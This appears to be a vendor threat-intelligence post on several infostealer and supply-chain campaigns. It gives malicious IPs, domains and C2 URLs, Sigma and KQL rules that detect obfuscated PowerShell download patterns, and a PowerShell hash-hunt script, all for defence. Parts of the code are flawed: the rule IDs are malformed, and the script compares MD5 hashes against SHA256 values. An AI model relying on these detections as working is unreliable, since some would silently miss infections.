Recent OTX pulses indicate a coordinated surge in credential theft activity targeting diverse sectors. Threat actors are leveraging sophisticated delivery chains, ranging from gaming social engineering to software supply chain compromises.
Key developments include the LofyStealer campaign targeting Minecraft players via Node.js loaders, ClickFix campaigns distributing Lumma Stealer and HijackLoader through obfuscated PowerShell, and KYCShadow, an Android banking Trojan focusing on financial sectors in India via WhatsApp. Additionally, a PyPI supply chain attack on the Xinference library highlights the ongoing risk to development environments, while GachiLoader has adopted novel AI skill lures to distribute the Rhadamanthys infostealer. Collectively, these campaigns aim to harvest browser data, banking credentials, OTPs, and cloud access keys.
Threat Actor / Malware Profile
LofyStealer (LofyGang)
- Distribution: Social engineering targeting Minecraft players; disguised within legitimate libraries.
- Payload: Two-stage malware consisting of a 53.5MB Node.js-based loader and a 1.4MB native C++ payload.
- Behavior: Executes directly in memory; extracts cookies, passwords, tokens, credit cards, and IBANs from multiple browsers.
- Evasion: Uses syscalls evasion techniques.
Lumma Stealer / HijackLoader
- Distribution: ClickFix-style phishing sites tricking users into running "fix" commands.
- Payload: Obfuscated PowerShell commands downloading malicious MSI payloads.
- Behavior: Utilizes DLL sideloading with renamed legitimate binaries; drops HijackLoader shellcode and Lumma Stealer.
KYCShadow
- Distribution: WhatsApp messages posing as bank KYC verification apps.
- Payload: Multi-stage dropper with native code obfuscation.
- Behavior: Intercepts SMS/OTP, manipulates VPN traffic, uses Firebase for C2, and employs WebView-based phishing overlays.
Xinference Supply Chain (PyPI)
- Distribution: Compromised package versions (2.6.0, 2.6.1, 2.6.2) on PyPI.
- Payload: Base64 encoded malicious code in
__init__.py. - Behavior: Executes upon library import to steal cloud credentials.
GachiLoader / Rhadamanthys
- Distribution: Fake "OpenClaw" AI agent skills hosted on GitHub.
- Behavior: Social engineering lure; users download Windows binaries thinking they are AI tools; leads to fileless injection of Rhadamanthys stealer.
IOC Analysis
The provided IOCs span multiple categories indicative of diverse infrastructure:
- Network Infrastructure (IPv4/Domains):
24.152.36.241(LofyStealer)85.11.161.198(Lumna/HijackLoader C2)serv.biz,serv.xyz,api.biz(KYCShadow)
- URLs:
http://robinhuds.com:9658/(ClickFix/Lumma)http://85.11.161.198:6600/...(Payload delivery)
- File Hashes: A significant volume of MD5, SHA1, and SHA256 hashes associated with Node.js loaders, MSI installers, and Python library components.
SOC Operational Guidance:
- Blocklist: Immediately block all associated IPs and Domains at the perimeter and proxy.
- EDR Scanning: Query EDR solutions for the specific file hashes provided to detect dropped payloads or loaders.
- Network Detections: Alert on outbound connections to the listed non-standard ports (e.g., 9658, 6600) and the specific domains.
Detection Engineering
Sigma Rules
YAML
title: Potential LofyStealer Node.js Loader Activity
id: 8c9e1a2b-3d4f-4g5h-6i7j-8k9l0m1n2o3p
description: Detects suspicious behavior associated with LofyStealer Node.js loader executing C++ payloads in memory or spawning unusual child processes.
status: stable
date: 2026/04/30
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/66000000/ # Placeholder reference ID
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\node.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\rundll32.exe'
condition: selection
falsepositives:
- Legitimate Node.js development scripts
level: high
tags:
- attack.execution
- attack.t1059.001
---
title: ClickFix PowerShell Obfuscation and MSI Download
id: 9d0f2e3c-4e5g-6h7i-8j9k-0l1m2n3o4p5q
description: Detects obfuscated PowerShell commands commonly used in ClickFix campaigns to download MSI payloads from remote servers.
status: stable
date: 2026/04/30
author: Security Arsenal
logsource:
product: windows
category: process_creation
detection:
selection_pwsh:
Image|endswith: '\powershell.exe'
CommandLine|contains:
- 'FromBase64String'
- 'EncodedCommand'
- 'IEX'
selection_msi:
CommandLine|contains: '.msi'
filter_legit:
User|contains: 'SYSTEM' # Exclude system maintenance
condition: selection_pwsh and selection_msi and not filter_legit
falsepositives:
- System administration scripts
level: critical
tags:
- attack.defense_evasion
- attack.t1027
- attack.command_and_control
- attack.t1102
---
title: PyPI Supply Chain Xinference Malicious Import
id: 0e1g3h4i-5j6k-7l8m-9n0o-1p2q3r4s5t6u
description: Detects execution of the compromised Xinference Python library versions which contain Base64 encoded malicious code.
status: stable
date: 2026/04/30
author: Security Arsenal
logsource:
product: linux
category: process_creation
detection:
selection_python:
Image|endswith:
- '/python3'
- '/python2'
- '\python.exe'
selection_cmd:
CommandLine|contains:
- 'import xinference'
- 'from xinference'
selection_version: # Specific to compromised versions
CommandLine|contains:
- 'site-packages/xinference-2.6.0'
- 'site-packages/xinference-2.6.1'
- 'site-packages/xinference-2.6.2'
condition: selection_python and selection_cmd and selection_version
falsepositives:
- Legitimate usage of specific xinference versions (if verified clean by org)
level: high
tags:
- attack.initial_access
- attack.t1195.002
KQL (Microsoft Sentinel)
KQL — Microsoft Sentinel / Defender
// Hunt for LofyStealer and Lumma Network Activity
let IoC_IPs = dynamic(["24.152.36.241", "85.11.161.198"]);
let IoC_Domains = dynamic(["serv.biz", "serv.xyz", "api.biz", "robinhuds.com"]);
DeviceNetworkEvents
| where RemoteIP in (IoC_IPs) or RemoteUrl has_any (IoC_Domains)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteIP, RemoteUrl, RemotePort, Action
| order by Timestamp desc
kql
// Hunt for ClickFix PowerShell and Suspicious MSI Downloads
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_any ("FromBase64String", "EncodedCommand", "-enc", "IEX") and ProcessCommandLine has ".msi"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, FolderPath, SHA256
| order by Timestamp desc
PowerShell Hunt Script
PowerShell
<#
.SYNOPSIS
IOC Hunt Script for LofyStealer, Lumma, KYCShadow (Components), Xinference, and GachiLoader.
.DESCRIPTION
Scans the file system for known malicious hashes associated with the OTX pulses.
Note: KYCShadow hashes are primarily Android APKs, but Windows C2 tools may exist.
#>
$TargetHashes = @(
# LofyStealer
"d21a5d08b4614005c8fcd9d0068f0190", "fb203c0ac030a97281960d7c28d86ebf",
"293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
# Lumma Stealer / HijackLoader
"f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
"c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728",
"b07a03883675654088a2b56a80933ca8", "b6a201726b44106a7dbe93a480b38420",
# Xinference (PyPI)
"3ee893ae46530b92e0d26435fb979d82", "484067fd6232f7cdd7b664b33857fc2c",
"077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c",
# GachiLoader / Rhadamanthys (Sample)
"076ba40e7fbf2910dff87f0c25862a70001d8ad81d23d8beae9fb9b29b603829",
"9fb2ea25254ae53f93f0e13abb59a76a6c1ed512cdf1c1deafafa4d2758117f6"
)
Write-Host "[+] Starting IOC Hunt for Infostealer Campaigns..." -ForegroundColor Cyan
$DrivesToScan = @("C:", "D:")
foreach ($Drive in $DrivesToScan) {
if (Test-Path $Drive) {
Write-Host "[+] Scanning $Drive for malicious files..." -ForegroundColor Yellow
try {
Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue |
ForEach-Object {
$File = $_
$Hash = (Get-FileHash -Path $File.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
if ($TargetHashes -contains $Hash) {
Write-Host "[!] MALICIOUS FILE FOUND: $($File.FullName)" -ForegroundColor Red
}
}
} catch {
Write-Host "[-] Error scanning drive $Drive : $_" -ForegroundColor DarkRed
}
}
}
# Check for Suspicious Temp folders often used by Node.js loaders (LofyStealer)
$TempPaths = @("$env:TEMP", "$env:APPDATA\npm-cache")
foreach ($Path in $TempPaths) {
if (Test-Path $Path) {
Write-Host "[+] Checking for suspicious Node.js activity in $Path" -ForegroundColor Yellow
Get-ChildItem -Path $Path -Filter "node.exe" -Recurse -ErrorAction SilentlyContinue | Select-Object FullName
}
}
Write-Host "[+] Hunt Complete." -ForegroundColor Green
Response Priorities
-
Immediate:
- Block all identified IPs and Domains on perimeter firewalls and proxies.
- Initiate endpoint scans for the file hashes provided in the IOC Analysis section.
- Isolate any endpoints showing signs of the ClickFix PowerShell pattern or LofyStealer Node.js execution.
-
24 Hours:
- Identity Verification: Given the prevalence of infostealers (Lumma, LofyStealer, KYCShadow), perform a force-password reset and MFA re-enrollment for accounts identified as potentially compromised during the hunt phase.
- Review Python package usage; enforce a ban on the compromised
xinferenceversions in internal PyPI mirrors or developer environments.
-
1 Week:
- Supply Chain Hardening: Implement policies requiring signature verification or pinned dependency files for internal developer environments to prevent PyPI/malware package ingestion.
- User Awareness: Conduct targeted security awareness training regarding ClickFix attacks, AI-themed lures (OpenClaw), and unsolicited KYC verification requests, especially for users in targeted regions (India).
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
darkwebotx-pulsedarkweb-credentialsinfostealercredential-theftsupply-chainandroid-malwaresocial-engineering
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.